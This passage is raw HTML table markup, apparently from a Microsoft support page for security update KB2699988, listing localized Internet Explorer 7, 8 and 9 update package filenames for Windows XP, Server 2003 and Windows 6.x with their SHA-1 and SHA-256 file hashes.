class=\"sbody-td\">2695A8C82629A82B181E2DC76363917F2E957D562B190A56D0A121696459338B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003.windowsxp-kb2699988-x64-chs.exe</td><td class=\"sbody-td\">AB615DE8CE915281A6175C4927D5896F05C9E86E</td><td class=\"sbody-td\">18061A35C113484614F568B4C2E6958EDC0201D73837139C05EB11A206FE6949</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003.windowsxp-kb2699988-x64-ita.exe</td><td class=\"sbody-td\">201A560747B730990976382944DAB6024289A960</td><td class=\"sbody-td\">9C926085D6DE959C34C0AA3BAB934924CDFCF2FA609D3FAEE90572036743FD71</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003-kb2699988-x86-nld.exe</td><td class=\"sbody-td\">D9291225462A9C95ECC24E4056A15A614425982D</td><td class=\"sbody-td\">FB9BC832EEA32D85188CC672F48F979C232A1126D7AB0294F470EDC0491BF4A9</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003-kb2699988-x86-csy.exe</td><td class=\"sbody-td\">B0EDA1894F1C609437B4F43E82139F614B3E50B6</td><td class=\"sbody-td\">61A67DC529CE87B02BB7A3B7386CB2060DDCF5353F1A6692A3F66D4D84FADB3E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003-kb2699988-x86-ptb.exe</td><td class=\"sbody-td\">75E54D51D1BA4F1DBA1D82B74DDADF407C24DC9B</td><td class=\"sbody-td\">4B77C626DF204B1B6995197226815D09F760B037DD149F3EB8CA1B29FAD518A7</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003-kb2699988-x86-fra.exe</td><td class=\"sbody-td\">F6127D77CADBA301CA658F7D28ADC0875E024234</td><td class=\"sbody-td\">7A89835EADEC0CBA1915B10D9D707E4C0AACD271E2A89CE54EA3CB1097FF64DE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003-kb2699988-x86-deu.exe</td><td class=\"sbody-td\">324B4AD1ABFDCEE18641AA70D1AAB5E7419AC726</td><td class=\"sbody-td\">D8113983BBDAF953F1342C6933608F0993888BA64B83D60E70D85518696267C6</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003-kb2699988-x86-jpn.exe</td><td class=\"sbody-td\">6E944314F86522FEF44579A173847D2FB3C83406</td><td class=\"sbody-td\">CB143BB175E08D970079451393D6A5F3FED82D553A5ED2EB3717A2382806E1F7</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003-kb2699988-x86-plk.exe</td><td class=\"sbody-td\">BE74802AE609DFFD2460DE61F54926151514C355</td><td class=\"sbody-td\">EC1D553C7FFBFF24397482E513194FAF2A8C6BD7B44EBF92005FFFF04C6ED1A4</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie9-windows6.1-kb2699988-x86.msu</td><td class=\"sbody-td\">2820E2FD398378D2CF4B1EDDE7A086764438F7C2</td><td class=\"sbody-td\">E38929923CA479D817B0588EA62B325FF202F8F2524F3AA45145385F5AD4163D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie9-windows6.0-kb2699988-x86.msu</td><td class=\"sbody-td\">620B26312E3485E2B536834A82BA8963917D2CF7</td><td class=\"sbody-td\">7D92920B0474676BEF0C5B05A665F096DDF2EBBFECB208F24803527EC73AE13C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-custom-enu.exe</td><td class=\"sbody-td\">E6B4684880C31EC6AED099BBE078E3425398A94D</td><td class=\"sbody-td\">B5C7B8ABC841536571889F7F3A1FAE6E4354191273DC4A5084853FE675C4EC96</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-custom-ell.exe</td><td class=\"sbody-td\">96CB74D23D25963E4F2782339D5412A0E782B189</td><td class=\"sbody-td\">543620A6EDF7E960F2CEDF9302603308F59A32B2F11A1CA8835E91C62FC38433</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-custom-fra.exe</td><td class=\"sbody-td\">545987F11166DC04D0613D875A646DFEED9AB7D0</td><td class=\"sbody-td\">E77210B39D945DC9A38CC6900AE7EA2C82A8C92A70D65A9E857E7E315269EBAE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-custom-ara.exe</td><td class=\"sbody-td\">F4D0F87ABF38FBF275392A3C9748A36E2CE13934</td><td class=\"sbody-td\">22C0CAD9536F3B9FC49CB44F3E6FDFAB26719905940F8826A461D25131685346</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-custom-jpn.exe</td><td class=\"sbody-td\">56CFACA3F22B03B4F7A773A917CF999080276C77</td><td class=\"sbody-td\">CAF5FA8DC7161605CBC4908F568F77257E34C0236411D791F1E966815E01E81C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-custom-deu.exe</td><td class=\"sbody-td\">35CF11BBC1A60606C2511904613F436FD05D269F</td><td class=\"sbody-td\">4D2E77852804C1DECB0EAD9367F1CDD4E485CA47B9F16767A3E04FA07AD558A8</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-custom-cht.exe</td><td class=\"sbody-td\">E120C08405EBC05D0552EF2C73DCC1854A72F739</td><td class=\"sbody-td\">F217F1013890839DDB8BE591D02DE0D906F073C341EF0B05C92CFDD30185C182</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-custom-chs.exe</td><td class=\"sbody-td\">931A16D0BE4EE89C23759B95BEC85AFC3CA3B50D</td><td class=\"sbody-td\">1340DCE0BF2C88009034801835EC4B5FAB0B983CBD50CEA1171A9043583FCF24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-custom-ptg.exe</td><td class=\"sbody-td\">82E6714C328D518A0FFC389FC5F0871A69368D5E</td><td class=\"sbody-td\">E3D03FF3C8FC90579FBBE1952C82C60838844DD5FB9B56C61F02A449B0E514D9</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-custom-trk.exe</td><td class=\"sbody-td\">77F654C7309DF235FD4F564F139FCB34D7B17440</td><td class=\"sbody-td\">7DB8389DB0D4E0BE1BF326E7520AB4FEF91F17F395E76B0F71BB9AF620039FFA</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-custom-kor.exe</td><td class=\"sbody-td\">11FB70381AEDCD7248CBF4D10384EB02516D2725</td><td class=\"sbody-td\">ABBE958725DC90FD8EAC57A8ACDB352C44147ED39FE9BD41B2082DAA548A6C0C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-custom-dan.exe</td><td class=\"sbody-td\">1CCBA29C539D11940CDADB782A25438D3CA95812</td><td class=\"sbody-td\">3B71F651A417D30DD0568B6080FD1E4B66D30211BEC9EC6F24098F381F3607EA</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-custom-ptb.exe</td><td class=\"sbody-td\">B12214C90CDC27661538E758FD7CEE22A300DCE0</td><td class=\"sbody-td\">9E42CF3CEBF0E8E649031557E2447ADC831446FC282C1972FA7A62B7427C2D49</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-custom-fin.exe</td><td class=\"sbody-td\">F23281BE655B1BC3C7E6B73254578C9EACD7EAFB</td><td class=\"sbody-td\">E345EB64527650446802AE99A939F391B5B88CD8FA5CBAC25D5A605989928562</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-custom-sve.exe</td><td class=\"sbody-td\">E75AAC374D05F857F5F6A8A3883C8F94ABCB4706</td><td class=\"sbody-td\">98A1D235EB24F2744F2E91FEF3F391A3995B439B03C71888D10596EAD2E5BF7A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-custom-csy.exe</td><td class=\"sbody-td\">C0022581F3A7E835DFFF778D7222A8879C2A048C</td><td class=\"sbody-td\">A8E2154B9EA8CF6543D6604D362F3168BD4AD09036775A38FBD0B3B5A67FB57E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-custom-hun.exe</td><td class=\"sbody-td\">31A770BF7B72685937B601DEF801FCC930DA3007</td><td class=\"sbody-td\">66513AC64441CB431A706F664E8D340D0CC8D4ED1EEC7ACBFF05B3185D77D531</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-custom-nld.exe</td><td class=\"sbody-td\">0A44861983618C137B45239871E508580E123748</td><td class=\"sbody-td\">1156B2987BD04288B820B17085A689E7B1295E03553EB7CC287A18C10E11E5B0</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-custom-nor.exe</td><td class=\"sbody-td\">FDB2F26CF765DC648B649D77F38092825E28A5DC</td><td class=\"sbody-td\">F996F642D9B8B1FC85BC10675120FAAD8C9589C16E5D0C7EB07B31D45B792AAC</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-custom-plk.exe</td><td class=\"sbody-td\">B99C2E9E77386EF15B2A6ACD157F95FDCEB6C37D</td><td class=\"sbody-td\">79D508446B5BDC84778FE7624D53BB6A01D21244EA512A0745B44A221286CC37</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-custom-rus.exe</td><td class=\"sbody-td\">DA539EACC8E89D8F23AD9A36DB36C3C85DC4A231</td><td class=\"sbody-td\">726334A9E11ABA40946865C11E35A8802EE2C75EB28D33A0413E7EDB8F243810</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-custom-esn.exe</td><td class=\"sbody-td\">F5FE8E0954B6009E1831D93FF9BACA4FFA94BAE0</td><td class=\"sbody-td\">36034FC50F85919EF95BD3F63C5620DF5D4287CEF370637080CED359CB3D10E9</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-enu.exe</td><td class=\"sbody-td\">62359CE85561D32E7AE4F396957040AEA02321A2</td><td class=\"sbody-td\">3292E51A39A405849AD0BCE7A37C53A1246FDC41B8C56BC9CD2EB891D793D46F</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-rus.exe</td><td class=\"sbody-td\">F2D3A09FAA78CF8C9CAEBE7191A5B37583BA65F9</td><td class=\"sbody-td\">DA315B176A3E9529B5DADD7A1DA425AFA39385BDE06DEC6DC251B523C1AFFC9F</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-csy.exe</td><td class=\"sbody-td\">203AF738AC1E40B97B7F8A84EDEC61E0752F94BD</td><td class=\"sbody-td\">B3C64857417ABD69E663B14AD53717675BEF44C4C35CA6CDAACDB167B067EE7C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-dan.exe</td><td class=\"sbody-td\">CF811B052E3C05310095F13AF85BDD20A2CE4161</td><td class=\"sbody-td\">DB3FCB899BB59821C94BE6C35E347ECCDB8114635DC1E840217D64DBA755277A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-esn.exe</td><td class=\"sbody-td\">9EDC8536C6400958E30C80254131474247803EE3</td><td class=\"sbody-td\">2C07786B223FAA83EEDFAFDB02858310D8C21407384ADA94DF9E7CC0399AF534</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-fin.exe</td><td class=\"sbody-td\">486075C772D6425ECAC9AEF3C93BA16E69739B81</td><td class=\"sbody-td\">4AA219AF257A94A065D5F539E1EC43E11E1EDE09CD8DAD724F77140A55D8957B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-hun.exe</td><td class=\"sbody-td\">71E6715265E829F5BBB91C89293ED9005E35718F</td><td class=\"sbody-td\">6F428042F3A0A3618DFE5362C75FA76D03A171F5A5F3F021FA7E95A6B0ED53C2</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-heb.exe</td><td class=\"sbody-td\">C65ED3A6997FC339F887272341014024D863DB27</td><td class=\"sbody-td\">424E00A9CCCB8BDA79414D142C307671FCB247C677060FD26AFB83CE54492F06</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-nld.exe</td><td class=\"sbody-td\">337BA1A18E74AEC0E55F57BD09F4B6BFB33D3BEC</td><td class=\"sbody-td\">16C333555F05FBC2213A26421290A9868A17207E32CB7D98E621F556B8BD0441</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-nor.exe</td><td class=\"sbody-td\">00FF897A3CA089140C14CF41CB4D8EEBA54D192F</td><td class=\"sbody-td\">42EDB8FB4F6285864AAB6759583B9D6D0D16767F54ECE6B11DF7A15860248C80</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-ptb.exe</td><td class=\"sbody-td\">7B21F73AADCC2529FD6968FECE22118503FBD17A</td><td class=\"sbody-td\">709D65B75F588FFB5FAF2B945705C11E482909436460AF3BDBBF34CCD1895034</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-plk.exe</td><td class=\"sbody-td\">B89C258E5212B6EA179D0F4668051927CCCD0B10</td><td class=\"sbody-td\">F7A3B08F77E85610F4531B397A3D7FAAEA91A5194A9DA2380EADA3F91F2CD56E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-trk.exe</td><td class=\"sbody-td\">A087F347C49B6E532A7F8A9A5D47E027E1FA4ABB</td><td class=\"sbody-td\">84A1C02AE0DBB9951BA6AE8488ABED944DB669F306ED4C0F6323E4B15F5B9DD4</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-deu.exe</td><td class=\"sbody-td\">250178E27BEE432E81DFB0610A8E8FC704099FBC</td><td class=\"sbody-td\">96AEC5CFEAAB0C935AE875A7215A1A1D83AFAE1148FCF03E9EF1EEA3B02680CF</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-ara.exe</td><td class=\"sbody-td\">7047D0AAA08F52157D9F1192AAC7E56939FAE19E</td><td class=\"sbody-td\">07BAED225502C71E3EDE0CF0CC8DC4AACEDA778D8CCF945E932A36FC8ADD3992</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-chs.exe</td><td class=\"sbody-td\">8CFCD420CF20C2BB4B90D3F222F641725799499B</td><td class=\"sbody-td\">36C630DA013E0F7D01DC2FCBB8868DAC5EDF21D3B6FFC39E8809DB367E2EC945</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-cht.exe</td><td class=\"sbody-td\">A6A447F1DE44AFB6C14B7201E02B3D4B5417D755</td><td class=\"sbody-td\">ED408F573F26AED196E7B5E24693626F20257AD5FE4782C32371317041A56C3B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-ell.exe</td><td class=\"sbody-td\">D4E033E4FB8433680667D82695FC7D9F4D7793EF</td><td class=\"sbody-td\">FA7D0F5E769F533F8F79759E6EBBC86CC734B9BDFE856E8057E1F8A8628311CB</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-fra.exe</td><td class=\"sbody-td\">9CD9284453997F5944F1B973722E731FF76CEDC8</td><td class=\"sbody-td\">42126089607DB426446A8CCE05F5DB57D02F5902543DBAC35F39365DA7708BBA</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-ita.exe</td><td class=\"sbody-td\">17B9A0B91B9ADB37E9B108FB8E1E3A9B07564D04</td><td class=\"sbody-td\">B24F51890C536BD0C383872EC748DA4008EB8A69B20CBFF624447ACFE7EEC3A0</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-jpn.exe</td><td class=\"sbody-td\">383C44586CDCE6A6028D78CA6E0D496AFD8DE783</td><td class=\"sbody-td\">F11FE6AE375E32EFD9AE1B1A88F901E2D1954E7651F3C7A674B16F0A6CB68EF7</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-kor.exe</td><td class=\"sbody-td\">C272BC3937C0F61CD97F63B6BEB686BFBA976630</td><td class=\"sbody-td\">7CC02D2479F96D9FE543FA3770441B3E8E195A476CE539F14894CBF8DE8920A7</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-ptg.exe</td><td class=\"sbody-td\">BF07E353DC1FB99248F3DEB42AA0134F526A4B58</td><td class=\"sbody-td\">3ECE27F0C28618E1696499C355A998464F7F355891F49740FE5C9279D4B79BDC</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-custom-ita.exe</td><td class=\"sbody-td\">7CA97C8553705D5008CD7861C40CC37402DDBADB</td><td class=\"sbody-td\">C6D7937D45A0AE56C32BE5D7EA678292D48BCDA791E6D03F61C73C50A30555C8</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-custom-heb.exe</td><td class=\"sbody-td\">66DDF35E91D63DCF6465B42FFBFDE0391AFFBAB8</td><td class=\"sbody-td\">985AEC213560E5137EE356997540B11326CC8209193CEF52BD2E9909B77A9A2B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-custom-enu.exe</td><td class=\"sbody-td\">4B54037D71B51DE5E40CEBDD74CBD92891C23EC2</td><td class=\"sbody-td\">EA7369ACBB1F4930F40D0CA9D790325C80703CC7C3990A5008882D4CC500C065</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-custom-deu.exe</td><td class=\"sbody-td\">0F1552EAA72EC08131FF8522E04B249323D4AA0F</td><td class=\"sbody-td\">E2C074E9EE049F73AD523046E26DFB5EF95D168BDE3B21519C7B03A2B7F1FF55</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-custom-chs.exe</td><td class=\"sbody-td\">58BEB55C699CD6F39E2E3FDEFC658B7196309D3A</td><td class=\"sbody-td\">E1C19E133332619AF31A852513077731A7C093D4A85A88A4C2543FC3C14484A8</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-custom-cht.exe</td><td class=\"sbody-td\">3FBFD6F2C3B9A3BDC3AE73439A4120D1957A3FE4</td><td class=\"sbody-td\">5A126A41B6409CA317A16200BBECFDF0448123963DF7C7BB00CCC43353DDDBD8</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-custom-ell.exe</td><td class=\"sbody-td\">86A43D6105FC1A27C44BA64601F96262A2377643</td><td class=\"sbody-td\">ECA4215216700436EA1DF522A903B8ACAA09FBD0F4744338987C5740A8221233</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-custom-fra.exe</td><td class=\"sbody-td\">CC34FFDB979DE35EAC6728FA092B8E23B64F3A50</td><td class=\"sbody-td\">C6566C046EC063BA9AAC19FC0183AF601B58F1BC4060DD871A6975C7C43F9EC3</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-custom-ita.exe</td><td class=\"sbody-td\">0C78B3D3D0EDF32BA42FD345531910A6B281A57F</td><td class=\"sbody-td\">EEC81D39C3D75C185F5D2CAE7B03FD0F520417E7E65F233EF9F52C9861F24E6F</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-custom-jpn.exe</td><td class=\"sbody-td\">8B4A900F0C6D943E75C102F713CA2555474C1103</td><td class=\"sbody-td\">80376E7C2BC372D2FF5026EC679E22EC0F6F0F9D3377B458399635C10A3B603F</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-custom-kor.exe</td><td class=\"sbody-td\">869B077D8EFF61C4CA075EDCB76225EBE136F993</td><td class=\"sbody-td\">EABB035F20B2518B45607A84154CEB8716ACC7797D7E593A5948EAD7DA94D268</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-custom-ptg.exe</td><td class=\"sbody-td\">F73024C7AD43C1884F7A91DD899E3D6A974E34BB</td><td class=\"sbody-td\">64C326628BA01DD03C57A78C2C2AD0CD6002C1F0716D99DFC5D44B104AF06DEC</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-custom-ara.exe</td><td class=\"sbody-td\">611DE842AC9F471A5EE46FD29C7702717CBFF8A7</td><td class=\"sbody-td\">CEC615BA53FCB3791976CEB26BAD4846A65DC26C644F29E7CDCCD9630DA6308E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-custom-trk.exe</td><td class=\"sbody-td\">47077E225965D2245C4D49AADECD6FEEA79A6F27</td><td class=\"sbody-td\">9F7603A43F1CAC6E15B8C8457638F25299AC7828089855740E0F3CCB03901419</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-custom-csy.exe</td><td class=\"sbody-td\">9E2F37DC2E148C19EA6FB455C54602429C3CF683</td><td class=\"sbody-td\">B66788F4BF62235451DE65AA1E49D3C0D7D35DD820CAE320A9B64EE5AABF3EFB</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-custom-dan.exe</td><td class=\"sbody-td\">20F2514D4E2C953B024650E9CEA4B35B682BCF6D</td><td class=\"sbody-td\">2BD68162D487AA2E70114000B0508FB9B1AEAD0EB9822895D377C8B38880DDC5</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-custom-heb.exe</td><td class=\"sbody-td\">65A0A789EB052734CB9F303C463AC74CA66FDF61</td><td class=\"sbody-td\">1BD09E9762984F150AB8FA738C4B4157FC69A8D515A5220749BAA20259ABC198</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-custom-hun.exe</td><td class=\"sbody-td\">E2EA19AEB97950EC747D341A3DD2C111C8A7138E</td><td class=\"sbody-td\">A297C533ED4AF43378599279C251BB577FA6A576D4516211B36F733A204E5C44</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-custom-plk.exe</td><td class=\"sbody-td\">A81FE41CCF416F78C2642B3A3C369002614C2CF6</td><td class=\"sbody-td\">6E1EFB3904CB480D221AE4D5E2DC1B2F22F727E9291047AD32473868E51A85EA</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-custom-nld.exe</td><td class=\"sbody-td\">CDCDD0ACF4D68F57130C4D4186A1A6948E86E995</td><td class=\"sbody-td\">B08FBD28E9EB22DF2F36BDC339152E5F44E6C89B18B810A25E89C7A326299504</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-custom-rus.exe</td><td class=\"sbody-td\">683968105F8910354B8D0449E5E93AAF47C9867E</td><td class=\"sbody-td\">E7259D5FFCA15E5D3676B7FEB810C9E8C75F42DE9B26BE81619F513C37B33066</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-custom-sve.exe</td><td class=\"sbody-td\">5EA55E5B27D6F786B98343634B234F619FDE6698</td><td class=\"sbody-td\">E05EE9C76E8275DC5640645E543EF19AAEC6441EAFC30E0BD158EDA17508EDD5</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-custom-fin.exe</td><td class=\"sbody-td\">9390F00404DE57046C8C5729612D5D00EB5868C8</td><td class=\"sbody-td\">4979C4773DDA706DBD0F26CD583D6CE6C0A8E615C269EC1F284DF734F6ABA280</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-custom-esn.exe</td><td class=\"sbody-td\">13D40A0E67AF1D9CAA41E5856153913B4C1446CE</td><td class=\"sbody-td\">706B585BBF2045B65D98FF79CB22477B137D96C2161214A2CA82772C2D9310D7</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-custom-nor.exe</td><td class=\"sbody-td\">E706400DA83F148690488B1E3486B08BBD46C57A</td><td class=\"sbody-td\">741130172D5839E9AF1D62F274253B68BC4E659EAFC4447EAC4C358C74EF309C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-custom-ptb.exe</td><td class=\"sbody-td\">B7966832F8670D9DC9E45B957E97B7E26F197384</td><td class=\"sbody-td\">4A7A5FB6D1D928536203C066C4A8407CBD682609EC7DB8B8E01C6AA2FB17369D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windows6.0-kb2699988-x86-custom.msu</td><td class=\"sbody-td\">87F046BDE2485015FB54C21DD1A6FFC27B36FED9</td><td class=\"sbody-td\">73FD742B8343E233F91A332E9E1CD8A07C1D2AD2B0B9E761163D2CC4B24B1472</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-sve.exe</td><td class=\"sbody-td\">0B51AF449DD60451F5DB7187083796C19158500C</td><td class=\"sbody-td\">90AB41C5657DE4942A62E4D12D977C14059E38542028D4434AD951DA33D09E01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2699988-ia64-enu.exe</td><td class=\"sbody-td\">9BF292AF89FBBE09B92D0A2FD40E65E98B456D23</td><td class=\"sbody-td\">4A0C3CDFDBB102EBEC254FC57D867DA561F612809899EA0B211449CE03B62577</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2699988-ia64-fra.exe</td><td class=\"sbody-td\">884A078B24E4A54A21E43FCBF40D40F8C0BC3AA3</td><td class=\"sbody-td\">D0C21CA28CFD902277AB0258FC72B8C6092018A06C1D69311EFC1563542A1A28</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2699988-ia64-deu.exe</td><td class=\"sbody-td\">3206104956B57FE260DB42316F624406BDE9FA4D</td><td class=\"sbody-td\">73EDB297EA162F6E3C79BE864A6D6519A362B9559FA676F597F563DCB9959F9D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003-kb2699988-x86-enu.exe</td><td class=\"sbody-td\">A81616A7CE0D3B51099EAEDA61277341D4047E73</td><td class=\"sbody-td\">88EA3E11229A6194751E1A56A0812D2FEF568D2C67703EFE7766358BDFE43477</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003-kb2699988-x86-plk.exe</td><td class=\"sbody-td\">F411F9525D70DF6AB85C449451CD2BA3DDEB84AB</td><td class=\"sbody-td\">CA84FF5F07D1B552A822CB83BAF503E155CB99FC9CA390BC4E1E336C6621F540</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003-kb2699988-x86-ptb.exe</td><td class=\"sbody-td\">5A33C1A072A2A08FCD239C3676B2CA8EA0218FE1</td><td class=\"sbody-td\">B2D83D61E274F9C647BE23B8214F166394FAD20297759495C45EB867619B862E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003-kb2699988-x86-hun.exe</td><td class=\"sbody-td\">B509651B6DEC8AD7EC2A8D4B01BBA292DF589AA7</td><td class=\"sbody-td\">1B39875899ECCE43FC97880453A72B96110706CE3255B774986D966400AC05AD</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003-kb2699988-x86-esn.exe</td><td class=\"sbody-td\">AC1B97DCC522E7599A89321750F7517180FC9F08</td><td class=\"sbody-td\">422844F2EE87B996D4693762AEF8D4FCF3148DDC621B4CBB3202748BC1561016</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003-kb2699988-x86-ita.exe</td><td class=\"sbody-td\">EFC8E666C8E989901B4FF64A52C045FD35D30F8E</td><td class=\"sbody-td\">238590A1A8A1A0857376B57ADABC67B1B08B3C9C3271EDFAF37120A7F6AAA052</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windows6.0-kb2699988-x86.msu</td><td class=\"sbody-td\">A24767B084E0C0613E270C951BB132572BE49031</td><td class=\"sbody-td\">1D8B3FE110C263A84B0F6BBD0CAEAD6B25519682E2307A3C8D65BF711B2AB88E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-enu.exe</td><td class=\"sbody-td\">627C747568C1E21CC2711693E8AABE9E0A5CE6EA</td><td 